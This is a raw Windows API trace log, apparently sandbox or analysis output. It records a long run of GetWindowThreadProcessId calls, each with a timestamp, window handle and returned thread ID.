	[0852.730] GetWindowThreadProcessId (in: hWnd=0x1099a, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x4c8
	[0852.730] GetWindowThreadProcessId (in: hWnd=0x1098c, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1960
	[0852.730] GetWindowThreadProcessId (in: hWnd=0x1097c, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1ce4
	[0852.730] GetWindowThreadProcessId (in: hWnd=0x1093c, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1b24
	[0852.730] GetWindowThreadProcessId (in: hWnd=0x20942, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x14e0
	[0852.731] GetWindowThreadProcessId (in: hWnd=0x204b0, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x17f0
	[0852.731] GetWindowThreadProcessId (in: hWnd=0x10952, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x854
	[0852.731] GetWindowThreadProcessId (in: hWnd=0x10950, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1268
	[0852.731] GetWindowThreadProcessId (in: hWnd=0x1094e, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1624
	[0852.731] GetWindowThreadProcessId (in: hWnd=0x1094c, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1b9c
	[0852.731] GetWindowThreadProcessId (in: hWnd=0x1094a, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x16f4
	[0852.731] GetWindowThreadProcessId (in: hWnd=0x10948, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x145c
	[0852.731] GetWindowThreadProcessId (in: hWnd=0x1093e, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x17d0
	[0852.731] GetWindowThreadProcessId (in: hWnd=0x206ba, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1d28
	[0852.732] GetWindowThreadProcessId (in: hWnd=0x1093a, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0xcb8
	[0852.732] GetWindowThreadProcessId (in: hWnd=0x20614, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1190
	[0852.732] GetWindowThreadProcessId (in: hWnd=0x2041c, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x3a8
	[0852.732] GetWindowThreadProcessId (in: hWnd=0x20420, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1bd0
	[0852.732] GetWindowThreadProcessId (in: hWnd=0x304c0, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1bfc
	[0852.732] GetWindowThreadProcessId (in: hWnd=0x108b8, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1a78
	[0852.732] GetWindowThreadProcessId (in: hWnd=0x108b2, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1b90
	[0852.732] GetWindowThreadProcessId (in: hWnd=0x108ac, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1b04
	[0852.733] GetWindowThreadProcessId (in: hWnd=0x108a0, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1b34
	[0852.733] GetWindowThreadProcessId (in: hWnd=0x1088e, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1b64
	[0852.733] GetWindowThreadProcessId (in: hWnd=0x1087c, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1bb0
	[0852.733] GetWindowThreadProcessId (in: hWnd=0x204f6, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1acc
	[0852.733] GetWindowThreadProcessId (in: hWnd=0x1083e, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1a2c
	[0852.733] GetWindowThreadProcessId (in: hWnd=0x2042c, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x19a8
	[0852.733] GetWindowThreadProcessId (in: hWnd=0x10836, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1944
	[0852.733] GetWindowThreadProcessId (in: hWnd=0x10826, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x18c8
	[0852.734] GetWindowThreadProcessId (in: hWnd=0x10822, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x18ac
	[0852.734] GetWindowThreadProcessId (in: hWnd=0x1081e, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x18ec
	[0852.734] GetWindowThreadProcessId (in: hWnd=0x1081a, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1898
	[0852.734] GetWindowThreadProcessId (in: hWnd=0x10810, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0xc98
	[0852.734] GetWindowThreadProcessId (in: hWnd=0x1080a, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x153c
	[0852.734] GetWindowThreadProcessId (in: hWnd=0x10806, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1808
	[0852.734] GetWindowThreadProcessId (in: hWnd=0x10790, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x12a4
	[0852.734] GetWindowThreadProcessId (in: hWnd=0x1078e, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1740
	[0852.735] GetWindowThreadProcessId (in: hWnd=0x10784, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x16c4
	[0852.735] GetWindowThreadProcessId (in: hWnd=0x107c2, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1820
	[0852.735] GetWindowThreadProcessId (in: hWnd=0x107b4, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x16ac
	[0852.737] GetWindowThreadProcessId (in: hWnd=0x1079a, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1858
	[0852.737] GetWindowThreadProcessId (in: hWnd=0x1077e, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1664
	[0852.737] GetWindowThreadProcessId (in: hWnd=0x10778, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x10b4
	[0852.737] GetWindowThreadProcessId (in: hWnd=0x10774, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x10ac
	[0852.738] GetWindowThreadProcessId (in: hWnd=0x20378, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x10ec
	[0852.738] GetWindowThreadProcessId (in: hWnd=0x10766, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1068
	[0852.738] GetWindowThreadProcessId (in: hWnd=0x10762, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x17e0
	[0852.738] GetWindowThreadProcessId (in: hWnd=0x1075e, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x102c
	[0852.738] GetWindowThreadProcessId (in: hWnd=0x1075a, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x17a4
	[0852.738] GetWindowThreadProcessId (in: hWnd=0x2035a, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1050
	[0852.738] GetWindowThreadProcessId (in: hWnd=0x1072c, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1694
	[0852.738] GetWindowThreadProcessId (in: hWnd=0x1071e, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1770
	[0852.739] GetWindowThreadProcessId (in: hWnd=0x10710, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1720
	[0852.739] GetWindowThreadProcessId (in: hWnd=0x10702, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x165c
	[0852.739] GetWindowThreadProcessId (in: hWnd=0x106ca, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1578
	[0852.739] GetWindowThreadProcessId (in: hWnd=0x204a6, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x16c0
	[0852.739] GetWindowThreadProcessId (in: hWnd=0x106c4, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x161c
	[0852.739] GetWindowThreadProcessId (in: hWnd=0x106c0, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1638
	[0852.739] GetWindowThreadProcessId (in: hWnd=0x20362, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x15c8
	[0852.739] GetWindowThreadProcessId (in: hWnd=0x106be, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1554
	[0852.740] GetWindowThreadProcessId (in: hWnd=0x106bc, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1674
	[0852.740] GetWindowThreadProcessId (in: hWnd=0x106b4, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1520
	[0852.740] GetWindowThreadProcessId (in: hWnd=0x1068e, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x14bc
	[0852.740] GetWindowThreadProcessId (in: hWnd=0x1067e, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0xf8c
	[0852.740] GetWindowThreadProcessId (in: hWnd=0x1066e, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0xe9c
	[0852.740] GetWindowThreadProcessId (in: hWnd=0x1065e, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1434
	[0852.740] GetWindowThreadProcessId (in: hWnd=0x1064e, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x14ec
	[0852.740] GetWindowThreadProcessId (in: hWnd=0x1063e, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0xfcc
	[0852.740] GetWindowThreadProcessId (in: hWnd=0x1062e, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x12ac
	[0852.741] GetWindowThreadProcessId (in: hWnd=0x1062a, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1484
	[0852.741] GetWindowThreadProcessId (in: hWnd=0x10626, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x934
	[0852.741] GetWindowThreadProcessId (in: hWnd=0x10622, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0xc0c
	[0852.741] GetWindowThreadProcessId (in: hWnd=0x1061c, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0xb08
	[0852.741] GetWindowThreadProcessId (in: hWnd=0x10610, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x948
	[0852.741] GetWindowThreadProcessId (in: hWnd=0x1060c, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1178
	[0852.741] GetWindowThreadProcessId (in: hWnd=0x105fa, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x13e0
	[0852.741] GetWindowThreadProcessId (in: hWnd=0x105ea, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0xcd0
	[0852.742] GetWindowThreadProcessId (in: hWnd=0x105da, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x13fc
	[0852.742] GetWindowThreadProcessId (in: hWnd=0x105c6, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0xdc8
	[0852.742] GetWindowThreadProcessId (in: hWnd=0x105b6, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0xc18
	[0852.742] GetWindowThreadProcessId (in: hWnd=0x105a6, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0xc2c
	[0852.742] GetWindowThreadProcessId (in: hWnd=0x10580, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0xa1c
	[0852.742] GetWindowThreadProcessId (in: hWnd=0x10578, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1244
	[0852.742] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0xdb0
	[0852.742] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1398
	[0852.743] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1358
	[0852.743] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1370
	[0852.743] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1340
	[0852.743] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x130c
	[0852.743] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x12c0
	[0852.743] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x12e4
	[0852.743] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1270
	[0852.743] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1298
	[0852.744] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x120c
	[0852.744] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x122c
	[0852.744] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x11c4
	[0852.744] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x11b0
	[0852.744] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1188
	[0852.744] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1148
	[0852.744] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1160
	[0852.744] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x10fc
	[0852.745] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0xe34
	[0852.745] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0xea4
	[0852.745] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x514
	[0852.745] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0xe48
	[0852.745] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0xbc8
	[0852.745] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0xdf8
	[0852.745] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x318
	[0852.745] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0xcac
	[0852.746] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x8bc
	[0854.384] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0xf9c
	[0854.384] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0xf48
	[0854.385] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0xe40
	[0854.385] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0xecc
	[0854.385] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0xeb8
	[0854.385] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0xe80
	[0854.385] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0xe98
	[0854.385] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0xe60
	[0854.385] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0xee4
	[0854.385] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0xf00
	[0854.385] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0xdf0
	[0854.385] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0xe1c
	[0854.385] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0xdd0
	[0854.386] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0xd94
	[0854.386] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0xd74
	[0854.386] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0xd00
	[0854.386] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0xcd8
	[0854.386] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0xc84
	[0854.386] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0xca4
	[0854.386] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0xc64
	[0854.386] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0xc24
	[0854.386] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0xb84
	[0854.386] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0xbac
	[0854.386] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x384
	[0854.387] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0xab8
	[0854.387] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x33c
	[0854.387] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0xa44
	[0854.387] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0xa64
	[0854.387] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x8a8
	[0854.387] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0xaf0
	[0854.387] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x88c
	[0854.387] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0xb04
	[0854.387] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x910
	[0854.387] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x230
	[0854.388] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0xac0
	[0854.388] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0xab4
	[0854.388] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0xaac
	[0854.388] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x3d0
	[0854.388] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x978
	[0854.388] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0xa7c
	[0854.388] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x59c
	[0854.388] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0xa88
	[0854.388] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0xa6c
	[0854.388] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0xa68
	[0854.388] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x9f8
	[0854.389] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0xa04
	[0854.389] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x924
	[0854.389] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x8dc
	[0854.389] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x7dc
	[0854.389] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x768
	[0854.389] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x764
	[0854.389] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x820
	[0854.389] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x810
	[0854.389] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x794
	[0854.389] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x83c
	[0854.390] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x7ac
	[0854.390] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0xb44
	[0854.390] GetWindowThreadProcessId (in: hWnd=0x108d6, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x6bc
	[0854.390] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0xb5c
	[0854.390] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x838
	[0854.390] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x4d0
	[0854.390] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x4d0
	[0854.390] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x4d0
	[0854.390] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x4d0
	[0854.390] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x4d0
	[0854.390] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x4d0
	[0854.391] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x4d0
	[0854.391] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x4d0
	[0854.391] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x818
	[0854.391] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x5b8
	[0854.391] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x494
	[0854.391] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x1ec
	[0854.391] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x440
	[0854.391] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x7e8
	[0854.391] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x730
	[0854.391] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x2c8
	[0854.391] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x31c
	[0854.392] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x330
	[0854.392] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x128
	[0854.392] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x5c8
	[0854.392] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x6f8
	[0854.392] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x358
	[0854.392] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x73c
	[0854.392] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0xb0
	[0854.392] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x250
	[0854.392] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x240
	[0854.392] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x790
	[0854.393] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x61c
	[0854.393] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x540
	[0854.393] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x538
	[0854.393] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x14de40 | out: lpdwProcessId=0x14de40) returned 0x568
